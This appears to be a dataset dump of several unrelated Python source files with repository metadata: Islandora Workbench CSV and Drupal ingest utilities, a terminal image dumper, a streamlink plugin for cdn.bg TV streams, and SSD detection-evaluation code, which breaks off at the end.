                                new_term_names_in_csv = True
                                validate_term_name_length(field_value, str(record_number), csv_field_name)
                                message = 'CSV field "' + csv_field_name + '" in row ' + \
                                    str(record_number) + ' contains a term ("' + field_value.strip() + '") that is '
                                message_2 = 'not in the referenced vocabulary ("' \
                                    + this_fields_vocabularies[0] + '"). That term will be created.'
                                logging.warning(message + message_2)
                        else:
                            new_term_names_in_csv = True
                            message = 'CSV field "' + csv_field_name + '" in row ' + \
                                str(record_number) + ' contains a term ("' + field_value.strip() + '") that is '
                            message_2 = 'not in the referenced vocabulary ("' + this_fields_vocabularies[0] + '").'
                            logging.error(message + message_2)
                            sys.exit('Error: ' + message + message_2)

                    # If this is a multi-taxonomy field, all term names must be namespaced using
                    # the vocab_id:term_name pattern, regardless of whether
                    # config['allow_adding_terms'] is True.
                    if len(this_fields_vocabularies) > 1:
                        split_field_values = field_value.split(config['subdelimiter'])
                        for split_field_value in split_field_values:
                            # Check to see if the namespaced vocab is referenced by this field.
                            [namespace_vocab_id, namespaced_term_name] = split_field_value.split(':', 1)
                            if namespace_vocab_id not in this_fields_vocabularies:
                                message = 'CSV field "' + csv_field_name + '" in row ' \
                                    + str(record_number) + ' contains a namespaced term name '
                                message_2 = '(' + namespaced_term_name.strip(
                                ) + '") that specifies a vocabulary not associated with that field.'
                                logging.error(message + message_2)
                                sys.exit('Error: ' + message + message_2)

                            tid = find_term_in_vocab(config, namespace_vocab_id, namespaced_term_name)

                            # Warn if namespaced term name is not in specified vocab.
                            if config['allow_adding_terms'] is True:
                                if tid is False and split_field_value not in new_terms_to_add:
                                    new_term_names_in_csv = True
                                    message = 'CSV field "' + csv_field_name + '" in row ' + \
                                        str(record_number) + ' contains a term ("' + namespaced_term_name.strip() + '") that is '
                                    message_2 = 'not in the referenced vocabulary ("' \
                                        + namespace_vocab_id + '"). That term will be created.'
                                    logging.warning(message + message_2)
                                    new_terms_to_add.append(split_field_value)

                                    validate_term_name_length(split_field_value, str(record_number), csv_field_name)
                            # Die if namespaced term name is not specified vocab.
                            else:
                                if tid is False:
                                    message = 'CSV field "' + csv_field_name + '" in row ' + \
                                        str(record_number) + ' contains a term ("' + namespaced_term_name.strip() + '") that is '
                                    message_2 = 'not in the referenced vocabulary ("' \
                                        + namespace_vocab_id + '").'
                                    # NOTE(review): this logs at warning level but then
                                    # exits; the parallel branches above use
                                    # logging.error — confirm intended.
                                    logging.warning(message + message_2)
                                    sys.exit('Error: ' + message + message_2)

    return new_term_names_in_csv
def write_to_output_csv(config, id, node_json):
    """Appends a row to the CVS file located at config['output_csv'].

    The row maps the input CSV ID to the newly created node's nid, uuid,
    title, and status, taken from *node_json* (the JSON body returned by
    Drupal). A header row is written only if the file doesn't already
    start with one.
    """
    if config['task'] == 'create_from_files':
        config['id_field'] = 'ID'

    node_dict = json.loads(node_json)
    node_field_names = list(node_dict.keys())
    node_field_names.insert(0, 'node_id')
    node_field_names.insert(0, config['id_field'])
    # Don't include these Drupal fields in our output.
    fields_to_remove = [
        'nid',
        'vid',
        'created',
        'changed',
        'langcode',
        'default_langcode',
        'uid',
        'type',
        'revision_timestamp',
        'revision_translation_affected',
        'revision_uid',
        'revision_log',
        'content_translation_source',
        'content_translation_outdated']
    for field_to_remove in fields_to_remove:
        # Bug fix: list.remove() raises ValueError when the field is absent
        # from the node JSON (e.g. the content translation fields when that
        # module is not enabled), so only remove fields that are present.
        if field_to_remove in node_field_names:
            node_field_names.remove(field_to_remove)

    # Context managers guarantee the handles are closed even on error.
    with open(config['output_csv'], 'a+') as csvfile:
        writer = csv.DictWriter(csvfile, fieldnames=node_field_names, lineterminator="\n")

        # Check for presence of header row, don't add it if it's already there.
        with open(config['output_csv']) as f:
            first_line = f.readline()
        if not first_line.startswith(config['id_field']):
            writer.writeheader()

        # Assemble the CSV record to write.
        row = dict()
        row[config['id_field']] = id
        row['node_id'] = node_dict['nid'][0]['value']
        row['uuid'] = node_dict['uuid'][0]['value']
        row['title'] = node_dict['title'][0]['value']
        row['status'] = node_dict['status'][0]['value']
        writer.writerow(row)
def create_children_from_directory(config, parent_csv_record, parent_node_id, parent_title):
    """Create one child node (plus its media) for every file in the input
    subdirectory named after the parent record's ID.

    Exits are not triggered here; failures to create a node are logged and
    the remaining files are still processed.
    """
    # These objects will have a title (derived from filename), an ID based on the parent's
    # id, and a config-defined Islandora model. Content type and status are inherited
    # as is from parent. The weight assigned to the page is the last segment in the filename,
    # split from the rest of the filename using the character defined in the
    # 'paged_content_sequence_seprator' config option.
    parent_id = parent_csv_record[config['id_field']]
    page_dir_path = os.path.join(config['input_dir'], parent_id)
    page_files = os.listdir(page_dir_path)
    # NOTE(review): page_file_return_dict is never populated or returned in
    # the visible code — appears to be vestigial.
    page_file_return_dict = dict()
    for page_file_name in page_files:
        filename_without_extension = os.path.splitext(page_file_name)[0]
        filename_segments = filename_without_extension.split(
            config['paged_content_sequence_seprator'])
        weight = filename_segments[-1]
        # Strip leading zeros, e.g. "003" -> "3".
        weight = weight.lstrip("0")
        # @todo: come up with a templated way to generate the page_identifier,
        # and what field to POST it to.
        page_identifier = parent_id + '_' + filename_without_extension
        page_title = parent_title + ', page ' + weight

        # @todo: provide a config option for page content type.
        node_json = {
            'type': [
                {'target_id': config['paged_content_page_content_type'],
                 'target_type': 'node_type'}
            ],
            'title': [
                {'value': page_title}
            ],
            'status': [
                {'value': config['published']}
            ],
            'field_model': [
                {'target_id': config['paged_content_page_model_tid'],
                 'target_type': 'taxonomy_term'}
            ],
            'field_member_of': [
                {'target_id': parent_node_id,
                 'target_type': 'node'}
            ],
            'field_weight': [
                {'value': weight}
            ]
        }

        if 'field_display_hints' in parent_csv_record:
            node_json['field_display_hints'] = [{'target_id': parent_csv_record['field_display_hints'], 'target_type': 'taxonomy_term'}]

        # Some optional base fields, inherited from the parent object.
        if 'uid' in parent_csv_record:
            if len(parent_csv_record['uid']) > 0:
                node_json['uid'] = [{'target_id': parent_csv_record['uid']}]

        if 'created' in parent_csv_record:
            if len(parent_csv_record['created']) > 0:
                node_json['created'] = [
                    {'value': parent_csv_record['created']}]

        node_headers = {
            'Content-Type': 'application/json'
        }
        node_endpoint = '/node?_format=json'
        node_response = issue_request(
            config,
            'POST',
            node_endpoint,
            node_headers,
            node_json,
            None)
        if node_response.status_code == 201:
            node_uri = node_response.headers['location']
            print('+ Node for child "' + page_title + '" created at ' + node_uri + '.')
            logging.info('Node for child "%s" created at %s.', page_title, node_uri)
            if 'output_csv' in config.keys():
                write_to_output_csv(config, page_identifier, node_response.text)

            # Record the new node ID so a rollback can delete it later.
            node_nid = node_uri.rsplit('/', 1)[-1]
            write_rollback_node_id(config, node_nid)

            # Attach the page file to the new node as media. create_media()
            # only needs a 'title' from the CSV record, so fake one.
            page_file_path = os.path.join(parent_id, page_file_name)
            fake_csv_record = collections.OrderedDict()
            fake_csv_record['title'] = page_title
            media_response_status_code = create_media(config, page_file_path, node_uri, fake_csv_record)
            allowed_media_response_codes = [201, 204]
            if media_response_status_code in allowed_media_response_codes:
                logging.info("Media for %s created.", page_file_path)
        else:
            logging.warning('Node for page "%s" not created, HTTP response code was %s.', page_identifier, node_response.status_code)
def write_rollback_config(config):
    """Write rollback.yml (in the current directory), a 'delete' task
    configuration that can undo the current run using rollback.csv.
    """
    path_to_rollback_config_file = os.path.join('rollback.yml')
    # Bug fix: the original never closed the file handle; the context
    # manager guarantees it is flushed and closed even if yaml.dump raises.
    with open(path_to_rollback_config_file, "w") as rollback_config_file:
        yaml.dump(
            {'task': 'delete',
             'host': config['host'],
             'username': config['username'],
             'password': config['password'],
             'input_dir': config['input_dir'],
             'input_csv': 'rollback.csv'},
            rollback_config_file)
def prep_rollback_csv(config):
    """Initialize config['input_dir']/rollback.csv: delete any existing
    copy, then write a file containing only the "node_id" header.
    """
    rollback_csv_path = os.path.join(
        config['input_dir'], 'rollback.csv')
    if os.path.exists(rollback_csv_path):
        os.remove(rollback_csv_path)
    with open(rollback_csv_path, "a+") as rollback_csv_file:
        rollback_csv_file.write("node_id" + "\n")
def write_rollback_node_id(config, node_id):
    """Append *node_id* (one per line) to config['input_dir']/rollback.csv."""
    rollback_csv_path = os.path.join(
        config['input_dir'], 'rollback.csv')
    with open(rollback_csv_path, "a+") as rollback_csv_file:
        rollback_csv_file.write(node_id + "\n")
def get_csv_from_google_sheet(config):
    """Export the Google Sheet at config['input_csv'] as CSV and save it to
    config['input_dir']/config['google_sheets_csv_filename'].

    Exits via sys.exit() if the sheet is missing (404) or not shared
    publicly (Google serves an HTML login/permission page instead of CSV).
    """
    url_parts = config['input_csv'].split('/')
    # Replace the trailing "edit#gid=..." URL segment with a CSV export
    # request for the configured worksheet (gid).
    url_parts[6] = 'export?gid=' + str(config['google_sheets_gid']) + '&format=csv'
    csv_url = '/'.join(url_parts)
    response = requests.get(url=csv_url, allow_redirects=True)

    if response.status_code == 404:
        message = 'Workbench cannot find the Google spreadsheet at ' + config['input_csv'] + '. Please check the URL.'
        logging.error(message)
        sys.exit('Error: ' + message)

    # Sheets that aren't publicly readable return a 302 and then a 200 with a bunch of HTML for humans to look at.
    if response.content.strip().startswith(b'<!DOCTYPE'):
        message = 'The Google spreadsheet at ' + config['input_csv'] + ' is not accessible.\nPlease check its "Share" settings.'
        logging.error(message)
        sys.exit('Error: ' + message)

    input_csv_path = os.path.join(config['input_dir'], config['google_sheets_csv_filename'])
    # Bug fix: the original used open(...).write(...) without ever closing
    # the handle; the context manager guarantees flush and close.
    with open(input_csv_path, 'wb+') as input_csv_file:
        input_csv_file.write(response.content)
def get_csv_from_excel(config):
    """Read the input Excel 2010 (or later) file and write it out as CSV.

    Reads the worksheet named in config['excel_worksheet'] and writes
    config['input_dir']/config['excel_csv_filename']. Exits via sys.exit()
    if the Excel file does not exist.
    """
    if os.path.isabs(config['input_csv']):
        input_excel_path = config['input_csv']
    else:
        input_excel_path = os.path.join(config['input_dir'], config['input_csv'])

    if not os.path.exists(input_excel_path):
        message = 'Error: Excel file ' + input_excel_path + ' not found.'
        logging.error(message)
        sys.exit(message)

    excel_file_path = config['input_csv']
    wb = openpyxl.load_workbook(filename=input_excel_path)
    ws = wb[config['excel_worksheet']]

    # First worksheet row supplies the CSV header names.
    headers = []
    header_row = ws[1]
    ws.delete_rows(0)
    for header_cell in header_row:
        headers.append(header_cell.value)

    records = []
    for row in ws:
        record = {}
        for x in range(len(header_row)):
            # Skip cells whose column has no header.
            if headers[x] is not None and row[x] is not None:
                record[headers[x]] = row[x].value
        records.append(record)

    input_csv_path = os.path.join(config['input_dir'], config['excel_csv_filename'])
    csv_writer_file_handle = open(input_csv_path, 'w+', newline='')
    csv_writer = csv.DictWriter(csv_writer_file_handle, fieldnames=headers)
    csv_writer.writeheader()
    # Only write rows that have a non-empty ID.
    # NOTE(review): when a record has 'node_id' but not config['id_field'],
    # the record[config['id_field']] lookup below raises KeyError — confirm
    # 'update' tasks set id_field to 'node_id' before reaching here.
    for record in records:
        if (config['id_field'] in record or 'node_id' in record) and record[config['id_field']] is not None:
            csv_writer.writerow(record)
    csv_writer_file_handle.close()
def download_remote_file(config, url, node_csv_row):
    """Download the file at *url* into a per-record subdirectory of
    config['input_dir'] and return the local path to the downloaded file.

    The local filename comes from the node title (when
    config['use_node_title_for_media'] is set) or from the last URL
    segment; a file extension guessed from the MIME type is appended when
    the name has none.
    """
    sections = urllib.parse.urlparse(url)
    try:
        response = requests.get(url, allow_redirects=True)
    except requests.exceptions.Timeout as err_timeout:
        message = 'Workbench timed out trying to reach ' + \
            sections.netloc + ' while connecting to ' + url + '. Please verify that URL and check your network connection.'
        logging.error(message)
        logging.error(err_timeout)
        print('Error: ' + message)
    except requests.exceptions.ConnectionError as error_connection:
        message = 'Workbench cannot connect to ' + \
            sections.netloc + ' while connecting to ' + url + '. Please verify that URL and check your network connection.'
        logging.error(message)
        logging.error(error_connection)
        print('Error: ' + message)
        # NOTE(review): after either exception, 'response' is unbound and the
        # code below raises; confirm whether this function should return/exit
        # here instead.

    # create_media() references the path of the downloaded file.
    subdir = os.path.join(config['input_dir'], re.sub('[^A-Za-z0-9]+', '_', node_csv_row[config['id_field']]))
    Path(subdir).mkdir(parents=True, exist_ok=True)

    if config["use_node_title_for_media"]:
        filename = re.sub('[^A-Za-z0-9]+', '_', node_csv_row['title'])
        if filename[-1] == '_':
            filename = filename[:-1]
        downloaded_file_path = os.path.join(subdir, filename)
        file_extension = os.path.splitext(downloaded_file_path)[1]
    else:
        downloaded_file_path = os.path.join(subdir, url.split("/")[-1])
        file_extension = os.path.splitext(url)[1]

    # Bug fix: the original called "f.close" without parentheses, so the
    # handle was never explicitly closed; the context manager guarantees
    # the file is flushed and closed before we inspect its MIME type.
    with open(downloaded_file_path, 'wb+') as f:
        f.write(response.content)

    mime = magic.from_file(downloaded_file_path, mime=True)
    ext = mimetypes.guess_extension(mime)
    if ext == '.jpe':
        ext = '.jpg'
    if file_extension == '':
        os.rename(downloaded_file_path, downloaded_file_path + ext)
        downloaded_file_path = downloaded_file_path + ext

    return downloaded_file_path
def get_csv_template(config, args):
    """Write an annotated CSV template for the configured content type, then exit.

    Produces '<input_csv>.csv_file_template' inside config['input_dir'] with a
    header row of field names followed by helper rows (labels, required flags,
    sample data, cardinality, documentation pointers) the user removes before
    using the file as real input.

    Note: 'args' is accepted for interface parity with other task entry
    points; it is not used in this function.
    """
    field_definitions = get_field_definitions(config)

    # Helper row: human-readable label for each field.
    field_labels = collections.OrderedDict()
    field_labels['REMOVE THIS COLUMN (KEEP THIS ROW)'] = 'LABEL (REMOVE THIS ROW)'
    for field_name in field_definitions:
        if field_definitions[field_name]['label'] != '':
            field_labels[field_name] = field_definitions[field_name]['label']
        else:
            field_labels[field_name] = ''

    # Helper row: whether each field is required in create tasks.
    required = collections.OrderedDict()
    required['REMOVE THIS COLUMN (KEEP THIS ROW)'] = 'REQUIRED IN CREATE TASKS (REMOVE THIS ROW)'
    for field_name in field_definitions:
        if field_definitions[field_name]['required'] != '':
            if field_definitions[field_name]['required'] is True:
                required[field_name] = 'Yes'
            else:
                required[field_name] = 'No'
    # Base/ID fields have fixed requirements regardless of field definitions.
    required['title'] = 'Yes'
    required['uid'] = 'No'
    required['langcode'] = 'No'
    required['created'] = 'No'
    required[config['id_field']] = 'Yes'
    if config['nodes_only'] is True:
        required['file'] = 'Yes'
    else:
        required['file'] = 'No'

    # Example values keyed by Drupal field type, used to fill the sample row.
    mapping = dict()
    mapping['string'] = 'Free text'
    mapping['string_long'] = 'Free text'
    mapping['text'] = 'Free text'
    mapping['text_long'] = 'Free text'
    mapping['geolocation'] = '+49.16,-123.93'
    mapping['entity_reference'] = '100 [or term name or http://foo.com/someuri]'
    mapping['edtf'] = '2020-10-28'
    mapping['typed_relation'] = 'relators:art:30'
    mapping['integer'] = 100

    # Helper row: one plausible sample value per column.
    sample_data = collections.OrderedDict()
    sample_data['REMOVE THIS COLUMN (KEEP THIS ROW)'] = 'SAMPLE DATA (REMOVE THIS ROW)'
    sample_data[config['id_field']] = '0001'
    sample_data['file'] = 'myimage.jpg'
    sample_data['uid'] = '21'
    sample_data['langcode'] = 'fr'
    sample_data['created'] = '2020-11-15T23:49:22+00:00'
    sample_data['title'] = 'Free text'
    for field_name in field_definitions:
        if field_definitions[field_name]['field_type'] in mapping:
            sample_data[field_name] = mapping[field_definitions[field_name]['field_type']]
        else:
            sample_data[field_name] = ''

    # NOTE(review): opened in append ('a+') mode — rerunning this command adds
    # duplicate rows to an existing template rather than replacing it; confirm
    # whether that is intended.
    csv_file_path = os.path.join(config['input_dir'], config['input_csv'] + '.csv_file_template')
    csv_file = open(csv_file_path, 'a+')
    writer = csv.DictWriter(csv_file, fieldnames=sample_data.keys(), lineterminator="\n")
    writer.writeheader()
    # We want the labels and required rows to appear as the second and third rows so
    # add them before we add the sample data.
    writer.writerow(field_labels)
    writer.writerow(required)
    writer.writerow(sample_data)

    # Helper row: allowed number of values per field ('unlimited' for -1).
    cardinality = collections.OrderedDict()
    cardinality['REMOVE THIS COLUMN (KEEP THIS ROW)'] = 'NUMBER OF VALUES ALLOWED (REMOVE THIS ROW)'
    cardinality[config['id_field']] = '1'
    cardinality['file'] = '1'
    cardinality['uid'] = '1'
    cardinality['langcode'] = '1'
    cardinality['created'] = '1'
    cardinality['title'] = '1'
    for field_name in field_definitions:
        if field_definitions[field_name]['cardinality'] == -1:
            cardinality[field_name] = 'unlimited'
        else:
            cardinality[field_name] = field_definitions[field_name]['cardinality']
    writer.writerow(cardinality)

    # Documentation-section names keyed by field type, for the final helper row.
    docs = dict()
    docs['string'] = 'Single-valued fields'
    docs['string_long'] = 'Single-valued fields'
    docs['text'] = 'Single-valued fields'
    docs['text_long'] = 'Single-valued fields'
    docs['geolocation'] = 'Geolocation fields'
    docs['entity_reference'] = 'Taxonomy reference fields'
    docs['edtf'] = 'EDTF fields'
    docs['typed_relation'] = 'Typed Relation fields'
    docs['integer'] = 'Single-valued fields'

    # Helper row: pointer into the documentation for each column.
    docs_tips = collections.OrderedDict()
    docs_tips['REMOVE THIS COLUMN (KEEP THIS ROW)'] = 'SECTION IN DOCUMENTATION (REMOVE THIS ROW)'
    docs_tips[config['id_field']] = 'Required fields'
    docs_tips['file'] = 'Required fields'
    docs_tips['uid'] = 'Base fields'
    docs_tips['langcode'] = 'Base fields'
    docs_tips['created'] = 'Base fields'
    docs_tips['title'] = 'Base fields'
    for field_name in field_definitions:
        if field_definitions[field_name]['field_type'] in docs:
            doc_reference = docs[field_definitions[field_name]['field_type']]
            docs_tips[field_name] = doc_reference
        else:
            docs_tips[field_name] = ''
    # field_member_of has no dedicated documentation section.
    docs_tips['field_member_of'] = ''
    writer.writerow(docs_tips)

    csv_file.close()
    print('CSV template saved at ' + csv_file_path + '.')
    sys.exit()
def get_percentage(part, whole):
    """Return *part* expressed as a percentage of *whole*."""
    scaled = 100 * float(part)
    return scaled / float(whole)
| 46.033119
| 181
| 0.602179
|
794afd12abf4f7a2582e47379c1258a41a0f9429
| 418
|
py
|
Python
|
src/dcmagick/dump/terminal.py
|
ar90n/dcmagick
|
c6816c7cb415da627992da871c8c5b7cfd8b7e93
|
[
"MIT"
] | 1
|
2020-09-29T15:11:25.000Z
|
2020-09-29T15:11:25.000Z
|
src/dcmagick/dump/terminal.py
|
ar90n/dcmagick
|
c6816c7cb415da627992da871c8c5b7cfd8b7e93
|
[
"MIT"
] | 2
|
2020-02-06T20:00:13.000Z
|
2020-02-11T17:58:14.000Z
|
src/dcmagick/dump/terminal.py
|
ar90n/dcmagick
|
c6816c7cb415da627992da871c8c5b7cfd8b7e93
|
[
"MIT"
] | null | null | null |
import numpy as np
from teimpy import Mode, get_drawer
from ..common.window import apply as apply_window
def _dump(mode, proxy):
    """Apply the display window to *proxy* and render it with the drawer for *mode*."""
    windowed = apply_window(proxy)
    return get_drawer(mode).draw(windowed)
def dump_braille(proxy):
    """Render *proxy* in the terminal using Unicode braille characters."""
    mode = Mode.BRAILLE
    return _dump(mode, proxy)
def dump_halfblock(proxy):
    """Render *proxy* in the terminal using half-block characters."""
    mode = Mode.HALF_BLOCK
    return _dump(mode, proxy)
def dump_iterm2(proxy):
    """Render *proxy* using the iTerm2 inline-image escape protocol."""
    mode = Mode.ITERM2_INLINE_IMAGE
    return _dump(mode, proxy)
| 18.173913
| 49
| 0.748804
|
794afd26ae5284adb569d6b3bc0b5f48116df809
| 2,439
|
py
|
Python
|
src/streamlink/plugins/cdnbg.py
|
eleeeeeee/abc
|
5d81d68c7a47e931f050632ae7cddb3b044971b4
|
[
"BSD-2-Clause"
] | 1
|
2019-11-25T01:37:21.000Z
|
2019-11-25T01:37:21.000Z
|
src/streamlink/plugins/cdnbg.py
|
eleeeeeee/abc
|
5d81d68c7a47e931f050632ae7cddb3b044971b4
|
[
"BSD-2-Clause"
] | 3
|
2018-06-22T23:33:46.000Z
|
2018-06-25T00:14:35.000Z
|
src/streamlink/plugins/cdnbg.py
|
eleeeeeee/abc
|
5d81d68c7a47e931f050632ae7cddb3b044971b4
|
[
"BSD-2-Clause"
] | 1
|
2020-08-12T08:27:22.000Z
|
2020-08-12T08:27:22.000Z
|
from __future__ import print_function
import re
from streamlink.compat import urlparse
from streamlink.plugin import Plugin
from streamlink.plugin.api import http
from streamlink.plugin.api import useragents
from streamlink.plugin.api import validate
from streamlink.stream import HLSStream
from streamlink.utils import update_scheme
class CDNBG(Plugin):
    """Streamlink plugin for Bulgarian broadcasters that stream through cdn.bg."""

    # Landing pages on supported broadcaster sites that embed a cdn.bg player.
    url_re = re.compile(r"""
        https?://(?:www\.)?(?:
            tv\.bnt\.bg/\w+(?:/\w+)?|
            bitelevision\.com/live|
            nova\.bg/live|
            kanal3\.bg/live|
            bgonair\.bg/tvonline|
            tvevropa\.com/na-zhivo|
            bloombergtv.bg/video
        )/?
    """, re.VERBOSE)
    # cdn.bg live-player iframe embedded in the broadcaster's page.
    iframe_re = re.compile(r"iframe .*?src=\"((?:https?:)?//(?:\w+\.)?cdn.bg/live[^\"]+)\"", re.DOTALL)
    # Three known ways the player markup exposes the HLS playlist URL.
    sdata_re = re.compile(r"sdata\.src.*?=.*?(?P<q>[\"'])(?P<url>http.*?)(?P=q)")
    hls_file_re = re.compile(r"(src|file): (?P<q>[\"'])(?P<url>(https?:)?//.+?m3u8.*?)(?P=q)")
    hls_src_re = re.compile(r"video src=(?P<url>http[^ ]+m3u8[^ ]*)")

    # Apply the extractors in order; the first regex that matches supplies the URL.
    stream_schema = validate.Schema(
        validate.any(
            validate.all(validate.transform(sdata_re.search), validate.get("url")),
            validate.all(validate.transform(hls_file_re.search), validate.get("url")),
            validate.all(validate.transform(hls_src_re.search), validate.get("url")),
        )
    )

    @classmethod
    def can_handle_url(cls, url):
        # True when the URL matches one of the supported broadcaster pages.
        return cls.url_re.match(url) is not None

    def find_iframe(self, res):
        """Return the first non-tag-manager cdn.bg iframe URL in *res*, or None.

        Protocol-relative ('//...') URLs inherit the scheme of self.url.
        """
        p = urlparse(self.url)
        for url in self.iframe_re.findall(res.text):
            if "googletagmanager" not in url:
                if url.startswith("//"):
                    return "{0}:{1}".format(p.scheme, url)
                else:
                    return url

    def _get_streams(self):
        # Fetch the broadcaster page, follow the embedded player iframe if any,
        # then pull the HLS playlist URL out of the player markup.
        http.headers = {"User-Agent": useragents.CHROME}
        res = http.get(self.url)
        iframe_url = self.find_iframe(res)
        if iframe_url:
            self.logger.debug("Found iframe: {0}", iframe_url)
            res = http.get(iframe_url, headers={"Referer": self.url})
        # The playlist URL may be protocol-relative; borrow the page's scheme.
        stream_url = update_scheme(self.url, self.stream_schema.validate(res.text))
        return HLSStream.parse_variant_playlist(self.session,
                                                stream_url,
                                                headers={"User-Agent": useragents.CHROME})


__plugin__ = CDNBG
| 36.402985
| 103
| 0.574006
|
794afdb6eb0640f6ad750056f9a489a6c2768e03
| 140
|
py
|
Python
|
tutorial/06_RangeImages/02_range_image_border_extraction.py
|
maguangyan/pclpy_tutorial
|
9ce54d1f1a70cf379b5954ad4d8bed3210e06a4c
|
[
"BSD-3-Clause"
] | 17
|
2021-10-04T08:00:50.000Z
|
2022-03-31T07:23:52.000Z
|
tutorial/06_RangeImages/02_range_image_border_extraction.py
|
maguangyan/pclpy_tutorial
|
9ce54d1f1a70cf379b5954ad4d8bed3210e06a4c
|
[
"BSD-3-Clause"
] | 3
|
2021-12-17T07:42:04.000Z
|
2022-03-30T02:17:15.000Z
|
tutorial/06_RangeImages/02_range_image_border_extraction.py
|
maguangyan/pclpy_tutorial
|
9ce54d1f1a70cf379b5954ad4d8bed3210e06a4c
|
[
"BSD-3-Clause"
] | 2
|
2022-03-18T07:19:19.000Z
|
2022-03-29T14:25:01.000Z
|
# -*- coding: utf-8 -*-
# @Time : DATE:2021/9/23
# @Author : yan
# @Email : 1792659158@qq.com
# @File : 02_range_image_border_extraction.py
| 23.333333
| 45
| 0.657143
|
794afdf53ce9f987102f1f752ac0355d9fef0985
| 5,451
|
py
|
Python
|
neodroidvision/detection/single_stage/ssd/ssd_evaluation.py
|
aivclab/vision
|
6c644dd72f68bca608a2900e5d9461e90fe841eb
|
[
"Apache-2.0"
] | 1
|
2019-07-03T04:33:51.000Z
|
2019-07-03T04:33:51.000Z
|
neodroidvision/detection/single_stage/ssd/ssd_evaluation.py
|
aivclab/vision
|
6c644dd72f68bca608a2900e5d9461e90fe841eb
|
[
"Apache-2.0"
] | 5
|
2019-07-03T04:38:07.000Z
|
2021-09-10T15:40:44.000Z
|
neodroidvision/detection/single_stage/ssd/ssd_evaluation.py
|
aivclab/vision
|
6c644dd72f68bca608a2900e5d9461e90fe841eb
|
[
"Apache-2.0"
] | 3
|
2019-10-03T06:14:40.000Z
|
2021-01-31T14:31:39.000Z
|
import logging
import torch
import torch.utils.data
from pathlib import Path
from torch.nn import Module
from torch.utils.data import DataLoader
from tqdm import tqdm
from typing import Any, List
from warg import NOD
from neodroidvision import PROJECT_APP_PATH
from neodroidvision.data.detection.coco import COCODataset, coco_evaluation
from neodroidvision.data.detection.voc import VOCDataset, voc_evaluation
from neodroidvision.detection.single_stage.ssd.object_detection_dataloader import (
object_detection_data_loaders,
)
from neodroidvision.utilities import (
distributing_utilities,
is_main_process,
synchronise_torch_barrier,
)
__all__ = ["do_ssd_evaluation"]
from draugr.numpy_utilities import Split
def compute_on_dataset(
    model: Module,
    data_loader: DataLoader,
    device: torch.device,
    cpu_device=torch.device("cpu"),
) -> dict:
    """Run *model* over every batch of *data_loader* and collect per-image outputs.

    Args:
        model: detector to run; called as ``model(images)``.
        data_loader: yields ``(images, targets, image_ids)`` triples.
        device: device the images are moved to for the forward pass.
        cpu_device: device each output is moved to before being stored.

    Returns:
        dict mapping image id to that image's model output (on *cpu_device*).
    """
    predictions = {}
    for images, _targets, image_ids in tqdm(data_loader):
        with torch.no_grad():
            outputs = model(images.to(device))
            for image_id, detection in zip(image_ids, outputs):
                predictions[image_id] = detection.to(cpu_device)
    return predictions
def accumulate_predictions_from_cuda_devices(predictions_per_gpu: Any) -> list:
    """Gather per-rank prediction dicts onto the main process and flatten them.

    :param predictions_per_gpu: this rank's {image_index: prediction} dict.
    :return: on the main process, a list indexed by image id; ``None`` on all
        other ranks. Returns ``[]`` when no predictions were gathered.
    """
    all_predictions = distributing_utilities.all_gather_cuda(predictions_per_gpu)
    if not distributing_utilities.is_main_process():
        return
    predictions = {}
    for p in all_predictions:  # merge the list of dicts
        predictions.update(p)
    # Bug fix: with no predictions at all, image_ids[-1] below raised
    # IndexError; return an empty result instead.
    if not predictions:
        return []
    image_ids = list(
        sorted(predictions.keys())
    )  # convert a dict where the key is the index in a list
    if len(image_ids) != image_ids[-1] + 1:
        logger = logging.getLogger("SSD.inference")
        logger.warning(
            "Number of images that were gathered from multiple processes is not a contiguous set. Some "
            "images "
            "might be missing from the evaluation"
        )
    return [predictions[i] for i in image_ids]
def evaluate_dataset(dataset, predictions, output_dir: Path, **kwargs) -> dict:
    """evaluate dataset using different methods based on dataset type.
    Args:
        dataset: Dataset object
        predictions(list[(boxes, labels, scores)]): Each item in the list represents the
            prediction results for one image. And the index should match the dataset index.
        output_dir: output folder, to save evaluation files or results.
    Returns:
        evaluation result"""
    # Pick the evaluator matching the concrete dataset class.
    if isinstance(dataset, VOCDataset):
        evaluator = voc_evaluation
    elif isinstance(dataset, COCODataset):
        evaluator = coco_evaluation
    else:
        raise NotImplementedError
    return evaluator(
        dataset=dataset, predictions=predictions, output_dir=output_dir, **kwargs
    )
def inference_ssd(
    *,
    model: Module,
    data_loader: DataLoader,
    dataset_name: str,
    device: torch.device,
    output_folder: Path = None,
    use_cached: bool = False,
    **kwargs,
) -> dict:
    """Run (or load cached) inference on one dataset and evaluate the results.

    :param model: detector, already in eval mode.
    :param data_loader: loader over the dataset to evaluate.
    :param dataset_name: name used for logging.
    :param device: device the forward passes run on.
    :param output_folder: directory where predictions.pth is cached and where
        evaluation artifacts go. NOTE(review): although it defaults to None,
        the body unconditionally does ``output_folder / "predictions.pth"``,
        so callers must supply a real Path.
    :param use_cached: reuse a previously saved predictions.pth when present.
    :param kwargs: forwarded to evaluate_dataset.
    :return: evaluation result dict; None on non-main distributed ranks."""
    dataset = data_loader.dataset
    logger = logging.getLogger("SSD.inference")
    logger.info(f"Evaluating {dataset_name} dataset({len(dataset)} images):")
    predictions_path = output_folder / "predictions.pth"
    if use_cached and predictions_path.exists():
        predictions = torch.load(predictions_path, map_location="cpu")
    else:
        predictions = compute_on_dataset(model, data_loader, device)
        synchronise_torch_barrier()
        # Merge per-rank predictions; only the main process gets a result.
        predictions = accumulate_predictions_from_cuda_devices(predictions)
    if not is_main_process():
        return
    if output_folder:
        torch.save(predictions, predictions_path)
    return evaluate_dataset(
        dataset=dataset, predictions=predictions, output_dir=output_folder, **kwargs
    )
@torch.no_grad()
def do_ssd_evaluation(
    data_root: Path, cfg: NOD, model: Module, distributed: bool, **kwargs) -> List:
    """Evaluate *model* on every test dataset configured in *cfg*.

    :param data_root: root directory of the datasets.
    :param cfg: experiment configuration (supplies DATASETS.TEST, MODEL.DEVICE).
    :param model: trained detector; unwrapped if DistributedDataParallel.
    :param distributed: whether data loading runs in distributed mode.
    :param kwargs: forwarded to inference_ssd.
    :return: one evaluation-result entry per test dataset."""
    if isinstance(model, torch.nn.parallel.DistributedDataParallel):
        model = model.module
    model.eval()
    device = torch.device(cfg.MODEL.DEVICE)

    loaders = object_detection_data_loaders(
        data_root=data_root,
        cfg=cfg,
        split=Split.Validation,
        distributed=distributed,
    )
    return [
        inference_ssd(
            model=model,
            data_loader=loader,
            dataset_name=name,
            device=device,
            output_folder=PROJECT_APP_PATH.user_data
            / "results"
            / "inference"
            / name,
            **kwargs,
        )
